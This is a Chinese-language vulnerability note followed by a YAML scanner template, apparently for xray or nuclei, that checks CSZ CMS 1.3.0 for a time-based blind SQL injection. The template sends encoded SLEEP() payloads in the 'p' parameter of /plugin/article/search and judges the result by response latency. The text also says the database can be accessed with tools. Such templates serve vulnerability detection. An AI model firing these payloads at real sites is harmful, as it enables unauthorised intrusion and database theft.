漏洞描述
首先转到CSZ CMS网页
然后转到http://yourhost/plugin/articleCMS上的目录。
要查看基于错误的SQLi漏洞,请在搜索部分输入“”字符。
确定“p”参数造成了漏洞。
可以使用手动或自动工具访问数据库。
csz-cms-multiple-blind-sql-injection: CSZCMS V1.3.0 - 'Multiple' Blind SQLi
PoC代码[已公开]
id: csz-cms-multiple-blind-sql-injection
info:
name: CSZCMS V1.3.0 - 'Multiple' Blind SQLi
author: Dogukan Dincer
severity: critical
verified: false
description: |
首先转到CSZ CMS网页
然后转到http://yourhost/plugin/articleCMS上的目录。
要查看基于错误的SQLi漏洞,请在搜索部分输入“”字符。
确定“p”参数造成了漏洞。
可以使用手动或自动工具访问数据库。
reference:
- https://www.exploit-db.com/exploits/50899
tags: csz,cms,sql
created: 2024/03/16
rules:
r0:
request:
method: GET
path: /plugin/article/search?p=3D1%27%22)%20AND%20(SELECT%203910%20FROM%20(SELECT(SLEEP(10)))qIap)--%20ogLS
expression: |
response.status == 200 &&
response.body.bcontains(b'CSZ CMS') &&
response.latency <= 12000 &&
response.latency >= 10000
r1:
request:
method: GET
path: /plugin/article/search?p=3D1%27%22)%20AND%20(SELECT%203910%20FROM%20(SELECT(SLEEP(6)))qIap)--%20ogLS
expression: |
response.status == 200 &&
response.body.bcontains(b'CSZ CMS') &&
response.latency <= 8000 &&
response.latency >= 6000
r2:
request:
method: GET
path: /plugin/article/search?p=3D1%27%22)%20AND%20(SELECT%203910%20FROM%20(SELECT(SLEEP(10)))qIap)--%20ogLS
expression: |
response.status == 200 &&
response.body.bcontains(b'CSZ CMS') &&
response.latency <= 12000 &&
response.latency >= 10000
r3:
request:
method: GET
path: /plugin/article/search?p=3D1%27%22)%20AND%20(SELECT%203910%20FROM%20(SELECT(SLEEP(6)))qIap)--%20ogLS
expression: |
response.status == 200 &&
response.body.bcontains(b'CSZ CMS') &&
response.latency <= 8000 &&
response.latency >= 6000
expression: r0() && r1() && r2() && r3()